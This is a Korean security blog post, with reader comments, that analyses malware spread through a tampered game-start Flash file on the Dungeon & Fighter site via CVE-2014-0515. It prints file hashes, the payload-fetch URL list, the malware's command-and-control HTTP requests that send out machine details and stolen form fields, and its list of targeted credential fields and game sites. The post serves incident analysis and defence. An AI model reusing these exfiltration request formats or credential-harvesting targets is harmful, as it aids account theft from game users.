국내 악성코드 정보2014. 8. 17. 16:03

우선 정보를 제공해주신 바이러스 제로 시즌2 매니저님이신 ViOLeT님에게 진심으로 감사의 말씀을 드립니다.


해당 악성코드 유포는 현재(2014-08-17 23:45분 경) 이루어지지 않는 것으로 확인이 됩니다.^^


해당 악성코드는 CVE-2014-0515 Adobe Flash Player 취약점을 이용하고 있으니 Adobe Flash Player를 최신버젼으로 업데이트해주시기 바랍니다.


http://get.adobe.com/kr/flashplayer/

 

 

사실 이 글을 단순히 '이렇게 해서 이렇게 됬다'하고 걍 짚고 넘어갈려고 했는데 트위터라든가 페북, 블로그, 개드립을 포함한 각종 커뮤니티에서 링크를 걸어주시는 바람에 이렇게 넘어가기는 좀 그렇고.... 좀 더 명확하게 언급하고 넘어가고자 합니다.

 

 

1. 넥슨 던파 공식 홈페이지 내 게임 스타트 부분을 담당하는 SWF 파일에 접근할 때 악성코드 유포지로 리다이렉트되는 현상 발생. 해당 기법은 아직까지 보안 업계 쪽에서도 파악하지 못한 상태이며, 즉 던파 공식 홈페이지 변조라든가.... 웹쉘, XSS에 대한 가능성은 낮으며, 해킹 여부는 아직 불확실. 참고로 해당 기법을 사용하는 악성코드는 이전에 라이브리에서 대량 유포된 사태가 발생. 그리고 리다이렉트되어 나타나는 변조 게임 스타트 SWF는 CVE-2014-0515 Adobe Flash Player 취약점을 활용하고 있으니 반드시 Adobe Flash Player를 최신 버젼으로 업데이트할 것! 그리고 전반적으로 Adobe Flash Player만 하는 것이 아니라 윈도우 보안 업데이트를 포함한 각종 어플리케이션에 대한 최신 버젼 업데이트를 권장(문제가 있는 건 제외하고).

 

 

2. 생성된 midimapbits.dll은 BITS 서비스 파라메터 값(ServiceDll) 변조, 알약, V3 365 clinic, V3 Lite 등을 대상으로 언인스톨 방식을 통해 백신을 삭제하며, 다수의 웹 사이트로 이미지 파일 요청하여 조건 만족시 복호화 과정을 거쳐 추가 악성코드 다운로드.

 

 

3. 추가 다운로드된 악성코드는 이전에 온라인게임핵 악성코드에서 많이 볼 수 있는 알약, V3 제품군과 관련된 백신 무력화, 그리고 넥슨 게임(특히 던파는 OTP 우회 기능이 있는 걸로 확인), 한게임 등의 게임 관련 사이트를 상대로 계정을 탈취 시도.

 

 

 

4. 결과적으로 해당 악성코드는 물론 넥슨 쪽이 문제인지는 조금 지켜봐야할 문제이나 애초에 Adobe Flash Player만 최신 버젼으로 업데이트되면 컴퓨터가 악성코드에 감염될 일이 없었음에도 불구 사용자의 귀차니즘으로 인하여 생긴 인재이다. 이번 계기를 통해 감염되신 분은 유감이지만 반성 좀 하고 업데이트 습관을 가지려는 노력을 하자.

 

 

 

어제 오늘쯤 이미지 요청 공격 기법에 대한 악성코드 유포가 있었음을 확인하였으나 금일 정보 제공자로 부터 넥슨 던파에서 악성코드가 유포되고 있었음을 확인하였다. 조금 더 확인해본 결과 넥슨 던파의 게임 스타트 관련한 Swf 파일 접근시 리다이렉트하여 악성코드가 삽입된 가짜 스타트 버튼으로 유도하며, Adobe Flash Player 취약점에 의해 최종적으로 다운받아지는 파일은 아래와 같다.




>> nav3.css


MD5 : 327bb216674b90fe19c2cf1dc7281658

SHA1 : a2f6bbeaeb8e102adaf5b6aca8e2b4ff7c2da267

SHA256 : 755b298640b44e9f622782547f6874058babb29e403684053842423fd90f9676


Virustotal Results : 21 / 53

BitDefender : Gen:Trojan.Heur.RP.kCW@ae3BS4fH



해당 악성코드는 BITS 서비스의 파라메터 값을 변조하며, 추가적으로 midimapbits.dll을 생성한 뒤 이를 Rundll32.exe를 통해 About 파라메터로 중복 실행이 이루어진다. 그리고 이전에 발견된 악성코드와 마찬가지로 다수의 웹 사이트에 button03.jpg 파일을 요청한다. 더불어 V3 365 Clinic, V3 Lite, 알약 등의 안티 바이러스 제품을 레지스트리로 설치 경로를 받아온 뒤, 그 경로에 존재하는 언인스톨을 실행하여 강제로 삭제하는 기능을 수행한다.



www.srsr.co.kr/bbs2/data/prize/button03.jpg?201481714

www.pluspoint.jp/member/img/button03.jpg?201481714
www.myjeje.net/button03.jpg?201481714
snsdate.gndot.com/button03.jpg?201481714
www.smartrank.co.kr/***/**/button03.jpg?201481714   // 복호화 후 추가 다운로드
www.yahoo.co.jp/button03.jpg?201481714
www.nate.com/button03.jpg?201481714
www.srhan.co.kr/bbs/data/free/button03.jpg?201481714
www.yokoking.jp/
www.msn.com/button03.jpg?201481714
www.hangame.com/button03.jpg?201481714
www.gizmodo.jp/button03.jpg?201481714
www.joinsmsn.com/button03.jpg?201481714
www.joins.com/button03.jpg?201481714
www.plaync.jp/button03.jpg?201481714
www.tistory.com/start/button03.jpg?201481714
www.nexon.com/button03.jpg?201481714
user.nexon.com/button03.jpg
www.netmarble.net/button03.jpg?201481714



최종적으로 button03.jpg가 존재하는 웹 페이지를 %TEMP%에 image.jpg에 저장한 뒤 일련의 복호화 과정을 통해 1.234.**.***에서 menu.gif, main01.gif 다운로드를 하면서 이를 SetuptmpView.exe(Setuptempviewxxx.exe) 혹은 vhcccaiew.exe 파일로 저장하며, 최종적으로 98768515.txt를 C 파라메터로 실행을 한다.



>> menu.gif

MD5 : d79fd526e976a1f60a54d88d4939537e

SHA1 : eed833493156c90b9069bd05ee0ac7de4da93922

SHA256 : 4187417a543127b89ad8433b45b8ba6ef9efd9645049154949c98890fa3348b7


Virustotal Results : 10 / 54

BitDefender : Gen:Variant.Kazy.277089



>> main01.gif

MD5 : 41355e6c25a45ee53af2bfb33d1db19e

SHA1 : 00bc836dc6c93c1a8bdec9c3fed8e49d08b1ed3c

SHA256 : bbad3f04ab9b3bd622148a9e68bd5e94f80ff4722a6f1ae396339b87ac73da29


Virustotal Results : 18 / 52

BitDefender : Dropped:Generic.Lineage.58322928

nProtect : Dropped:Generic.Lineage.58322928



※ 해당 샘플은 모두 AZ에서 MZ으로 변경한 뒤 바이러스 토털에 업로드한 결과.



해당 악성코드는 네이트온으로 운영체제 정보, 맥 어드레스, 등의 정보를 전송하는 것으로 확인이 되며 다수의 게임을 상대로 계정 탈취 기능을 수행하는 온라인게임핵 악성코드 기능과 더불어 V3 백신을 타켓으로 하여 백신 무력화 기능을 수행한다.



1차 C&C 서버(가짜) - 1차적으로 Adobe Flash Player 취약점에 감염이 되어 생성된 midimapbits.dll은 아래의 사이트로 현재 감염된 컴퓨터의 맥 어드레스(Mac-Address), 운영체제 버젼, 인터넷 익스플로러 버젼을 체크하여 전송한다. 하지만 실질적으로 아래의 사이트로 연결이 이루어지지 않는 점을 고려한다면 정체를 숨기기 위한 페이크(Fake)로 여겨진다. 실제로 예전에도 이와 같은 악성코드를 지켜본 결과 연결이 이루어지지 않았으며.. 이러한 귀납추리는 상당히 개연성이 높다고 볼 수 있다.

 


GET /file/ac/view.php?m=080027F849CE&os=6.1&ie=8.0.7601.17514 HTTP/1.1

User-Agent: Mozilla/4.0 (Compatible; MSIE 6.0;)

Host: www.larvel.co.kr



2차 C&C 서버(진짜) - 다수의 웹 사이트에 대해 이미지 요청을 하여 조건에 만족하여 추가 악성코드를 다운로드할 경우 아래의 서버로 상기 서버에 전송하는 정보를 포함한 많은 정보를 전송한다.


POST /up808/zboard.asp HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept-Charset: UTF-8

Accept-Language: ko

User-Agent: NateOn/3.8.14.2(994)

Host: www.nwsbbt.com

Cache-Control: no-cache

Content-Length: 203


area=&uid=8&full=&pwd=6%2E1%5FX64&wp=&wf=&r=&rp=&sp=00000000000000&lck=&lg=&lv=0&my=0&pc=080027F849CE&n=0&plen=0&llen=0&ulen=0&bp=&ver=0808&weburl=www%2Enwsbbt%2Ecom&os=win7&iop=0&bps1=&bps2=&bpv1=&bpv2=



해당 악성코드는 RKDFRuning라는 뮤텍스가 사용이 되었다. 더불어 넥슨 게임과 더불어 한게임, 다음 계정 탈취를 시도한다. 특히 던파에서 유포가 되는 만큼 던파 계정 탈취 시도도 엿보인다.


password

pwd

pass

Pwd

Password

weburl=

lck=

pwd=

full=

uid=

&jumin4=

&jumin3=

username

&jumin2=

&jumin1=

&name=

d3d8d81.ini

bns.plaync.com

&pwd=

d3d8d80.ini

secretAnswer=

csrftoken=

d3d8d32.ini

www.daum.net

d3d8d13.ini

aion.plaync.com

d3d8d12.ini

lineage2.plaync.com

d3d8d3.ini

lineage.plaync.com

d3d8d60.ini

password=

userID=

d3d8d53.ini

netmarble.net

l_pwd=

l_id=

d3d8d7.ini

d3d8d6.ini

earthworm2=

turtle2=

d3d8d4.ini

page_gameid=

passwd=

usrid=

pmang.com

info4=8

&sbanner=

d3d8d91.ini

http://heroes.nexon.com

d3d8d90.ini

http://baram.nexon.com

d3d8d98.ini

http://fifaonline3.nexon.com

d3d8d97.ini

http://tales.nexon.com

d3d8d96.ini

http://asgard.nexon.com

d3d8d95.ini

http://lod.nexon.com

d3d8d89.ini

http://elsword.nexon.com

strLeftPw=

strLeftID=

dflogin=

sbanner=

yes

strEncData=

kt.hangame.com

tera.hangame.com

.hangame.com

poker.hangame.com

df.nexon.com

maplestory.nexon.com

fifaonline3.nexon.com

tales.nexon.com

asgard.nexon.com

lod.nexon.com

heroes.nexon.com

baram.nexon.com

elsword.nexon.com

send

ws2_32.dll

HttpSendRequestW

HttpSendRequestA

wininet.dll

c:\windows\1.okf

tmp_%d.tmp

dnf.exe

DNF.exe

Dungeon & Fighter



마지막으로 해당 악성코드는 안랩에서 개인 사용자를 위해 제공하는 V3 Lite 제품으로 사전 차단이 가능하며 ViOLeT님이 만드신 Malware Zero Kit 배치 스크립트 도구를 활용하여 삭제가 가능하다.(알약은 무한 진단을 하는 것으로 보여 보류)




참고로 현재 시점에서도 유포가 되고 있으며 현재 패킷 분석 중이다.

Posted by Ec0nomist

댓글을 달아 주세요

  1. 이전 댓글 더보기
  2. 저건 메인 페이지가 변조되서 인젝션 된건가요?? 웹쉘로 변조시킨건가...

    2014.08.18 04:51 [ ADDR : EDIT/ DEL : REPLY ]
  3. 저 어느 커뮤니티에서 유입한지는 모르나 불쾌감을 느낄만한 덧글은 자제 부탁드립니다.

    2014.08.18 07:44 신고 [ ADDR : EDIT/ DEL : REPLY ]
  4. 미드레아

    감사합니다. 혹시 네이버 던파카페에 이 글을 사용해도될까요?

    회원들에게 도움이 될것 같아서요

    2014.08.18 10:31 [ ADDR : EDIT/ DEL : REPLY ]
    • 음... ㅇㅅㅇ 출처 표기는 꼭 해주세요. 그리고 가급적 전문은 자제해주고 일부만 ㅠㅠ

      2014.08.18 10:33 신고 [ ADDR : EDIT/ DEL ]
  5. 미드레아

    네 알겠습니다. 제가 필요한게 저거 맬웨어 스크립트 도구 다운로드 링크랑.. 해결책 정도거든요. 감사합니다

    2014.08.18 10:33 [ ADDR : EDIT/ DEL : REPLY ]
  6. 미드레아

    http://cafe.naver.com/dfither/9671123

    작성한 글입니다. 시간되시면 확인해보시고 문제되는 부분있음 삭제할게요

    다시한번 감사드립니다

    2014.08.18 10:44 [ ADDR : EDIT/ DEL : REPLY ]
    • 아하. 던공카 카페 스텝 분이셨군요. 예전에 인다라천 키우던 던파 유저였는데... 아무튼 잘 봤습니다.

      글에는 이상한 내용은 없는데 다만 '던파 신종 해킹'이라고 보기에는 좀 어려워요. 우선 '신종'이라고 보기 어려운게 예전부터 라이브리에서 이 기법이 이용이 됬어요. 이건 인터넷 기사에서도 확인할 수 있어요.

      그리고 제 글 본문에도 나왔지만 '해킹'은 아직까지 정확한 정보가 아니에요. 그래서 오해의 여지가 없이 걍 '던파 공홈에서 악성코드 유포'로(혹은 유사한 의미) 정정해주셨으면 합니다.^^

      관심 가져주셔서 감사합니다.^^

      2014.08.18 10:55 신고 [ ADDR : EDIT/ DEL ]
  7. sim

    하ㅡㅡ 왠지 하 ㅡㅡ 저당햇네요 알약 다삭제되고 백신다무력화되서 던파공홈때문에 어제 9시간동안 애먹엇엇는데 포맷하려다가 책임안지나 던파새ㅡ끼들은?

    2014.08.18 11:09 [ ADDR : EDIT/ DEL : REPLY ]
  8. 던파통신 작성할려는데 혹시 원문 스크랩 해가도 될까요

    2014.08.18 12:18 [ ADDR : EDIT/ DEL : REPLY ]
  9. 복사붙이기를 통해서 사건의 경로가 어떻게됬는지와

    해결법은 이미 나와있는거지만 ; 따로 더 첨부해서 설명하구

    이렇게 해도 될까요 ; 일부분이나 통쨰로 스크랩하는거 허락구할려구 이렇게 급하게

    댓글달게 되었습니다

    2014.08.18 12:22 [ ADDR : EDIT/ DEL : REPLY ]
    • 블로그 운영 정책 상 전문 스크랩은 안되고 일부 게시글에 대한 스크랩은 가능하며, 출처 표기 해주셨으면 합니다^^

      감사합니다.

      2014.08.18 12:23 신고 [ ADDR : EDIT/ DEL ]
  10. 여담으로 지금도 해킹된 상태인가요?

    2014.08.18 12:23 [ ADDR : EDIT/ DEL : REPLY ]
  11. 그럼 현재 Adobe 업데이트를 구지 할 필요는 없는 상황이건가요 ..?

    해결된 사항이면 글쓰기가 애매해서요

    2014.08.18 12:24 [ ADDR : EDIT/ DEL : REPLY ]
  12. 일부 스크랩에 동의해주셔서 감사합니다

    출처는 꼭 남기구 작성하겠습니다

    2014.08.18 12:26 [ ADDR : EDIT/ DEL : REPLY ]
  13. 백호사탕

    안녕하세요. 던파통신에 본 게시글의 일부 스크랩을 통해 던파 유저분들에게 이 상황을 알리려고 합니다.
    스크랩에 대한 허락을 받고자 댓글 남깁니다.

    2014.08.18 12:33 [ ADDR : EDIT/ DEL : REPLY ]
    • 일부에 한하여 스크랩 가능합니다. 출처 표기 꼭 해주세요^^

      2014.08.18 13:29 신고 [ ADDR : EDIT/ DEL ]
    • 백호사탕

      http://chdw2438.blog.me/220095493456
      먼저 던파통신에 기재하신 분이 계셔서 그냥 블로그 포스팅만 해두었습니다.

      2014.08.18 14:05 [ ADDR : EDIT/ DEL ]
    • 넵^^

      2014.08.18 14:05 신고 [ ADDR : EDIT/ DEL ]
  14. 좋은정보 감사합니다.
    괜찮다면 루리웹 커뮤니티에 스크랩해가도 될까요 ?

    2014.08.18 13:35 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 전문은 안되며 일부 글에 한하여 스크랩 가능합니다. 더불어 출처 표기해주세요

      2014.08.18 13:28 신고 [ ADDR : EDIT/ DEL ]
  15. 던통 제목이 실제 사례와는 다른 케이스라서요...

    잠시후에 공지 예정인데 제목을 다르게 하셔서 올려주시거나 하시길

    부탁 드립니다.

    홈페이지가 해킹 당한게 아니라 컴퓨터가 악성코드에 감염된 상태로

    던파 홈페이지에 접속하여 이용할 경우 발생하는 케이스입니다 ㅇㅅㅇ;;

    지금 던파통신 제목 수정 요청이 들어왔는데

    지금 던통제목이 던파 공홈 해킹이당했습니다.그리고 대처법 이거든요

    Game Start 를 누르면 감염되는 악성코드 아닌가요?

    요점만 말하면 던파 홈페이지가 해킹당한건가요

    아님 컴퓨터 사용자측 잘못인가요?

    2014.08.18 15:16 [ ADDR : EDIT/ DEL : REPLY ]
    • 컴퓨터가 악성코드에 감염된 상태로 던파 홈페이지에 접속하여 이용할 경우 발생하는 케이스가 전 무슨 얘기인지 잘 모르겠네요. 네오플 측에서 그렇게 말하는건가요?

      Game Start를 누르면 감염이 되는 악성코드가 아니라 게임 스타트 버튼 SWF 파일을 로딩하면서 SWF에 존재하는 취약점에 의해 감염이 이루어집니다. 이 부분은 본문에도 설명이 되어져 있습니다.

      마지막으로 전 넥슨 던파 공홈 해킹이라고 언급하지도 않았고 또한 단정 지은 적이 없습니다.

      일단 CVE-2014-0515 어도비 플레시 플레이어 취약점 패치는 이미 오래전에 나왔음에도 불구하고 감염이 되었다는 점은 사용자의 귀차니즘으로 생긴 인재일 뿐입니다. 더불어 넥슨 홈페이지 유포의 경우 어떻게 유포가 되었고 리다이렉트가 이루어졌는지가 명확하지 않아서 좀 더 자세한 결과가 나왔으면 좋겠네요.

      2014.08.18 15:28 신고 [ ADDR : EDIT/ DEL ]
  16. 제가 너무 단정지어서 던통에 올린거였군요 .. 답변 감사합니다

    던파 공지사항에 떳던데 한번 읽어보세요

    2014.08.18 15:45 [ ADDR : EDIT/ DEL : REPLY ]
  17. 걷는만년삼

    저희 블로그 이웃들과 카페 회원에게도 알려주기 위해서 좀 퍼가겠습니다.

    2014.08.18 16:59 [ ADDR : EDIT/ DEL : REPLY ]
  18. 걷는만년삼

    네 일부만 캡쳐하고 출처로 링크를 거는 방식으로 하였습니다

    2014.08.18 17:14 [ ADDR : EDIT/ DEL : REPLY ]
  19. 진아

    던파 공식 홈페이지 하단에 보시면 집중토론란이 있는데 며칠전부터 안보이다 오늘 보이기 시작했습니다.
    혹시 이것도 악성코드와 연관이 있는가요?

    2014.08.18 18:14 [ ADDR : EDIT/ DEL : REPLY ]
    • 글쎄요... 그 부분에 대해서는 들어본 바 없네요.

      2014.08.18 18:15 신고 [ ADDR : EDIT/ DEL ]
    • 진아

      저 같은 경우는 피방에 가지 않았고 집에서만 접속을 했습니다.
      방금전에 컴 검색을 하니 start_new7.swf가 나왔고요...
      그러면은 던파 공홈에서 악성코드 다운 받았다는걸로 볼수 있는데
      이것은 어떻게 이해해야 하는지...
      넥슨 내부에서 이루어진 일이 아닌가 생각이 되네요...

      2014.08.18 18:19 [ ADDR : EDIT/ DEL ]
    • start_new7.swf 가지고 악성이다 정상이다를 판별할 수가 없습니다. 실제로 정상적으로 사용하는 swf나 악성코드에서 사용하는 swf나 이름이 똑같거든요.

      그리고 넥슨 내부에서 일어났는지는 아직 불투명하니 좀 지켜봐야겠네요.

      2014.08.18 18:24 신고 [ ADDR : EDIT/ DEL ]
    • 진아

      네... 말씀의 의도를 이해했습니다.
      답변주셔셔 감사합니다.

      2014.08.18 18:28 [ ADDR : EDIT/ DEL ]
  20. 진아

    그리고 지금 보시면 던파 공식 홈페이지 게임시작 버튼이 swf가 아니라 img로 변경이 되여있습니다.
    이 사실을 놓고 보면은 이번 악성코드는 일부 PC가 아니라 던파 공식홈페이지에 접속하시는 모든분들이 피해를 본것 같은 생각이 드네요.

    2014.08.18 18:27 [ ADDR : EDIT/ DEL : REPLY ]
    • 다시 확인해보니 http://df.nexon.com/d_fighter/game/gamestart.png으로 변경이 되었네요. 어제 발견했을 쯤에는 swf로 되어 있었어요. 아무래도 이번 사건의 여파로 인해 SWF가 아닌 png로 변경한 것으로 보입니다. 이에 대한 정황적인 증거는 위의 와이어샤크 패킷 자료로 확인이 가능합니다.

      그리고 이번 악성코드는 CVE-2014-0515가 사용된 점으로 미루어 Adobe Flash Player를 최신 버젼으로 업데이트하지 않은 일부 분에 한해 발생하였습니다. 모든 분이라고 하기에는 좀 어렵네요.

      2014.08.18 18:43 신고 [ ADDR : EDIT/ DEL ]
  21. 저도 당했는데.. KBS할때도 해킹시도되더라구요 (...)

    2014.08.19 02:06 신고 [ ADDR : EDIT/ DEL : REPLY ]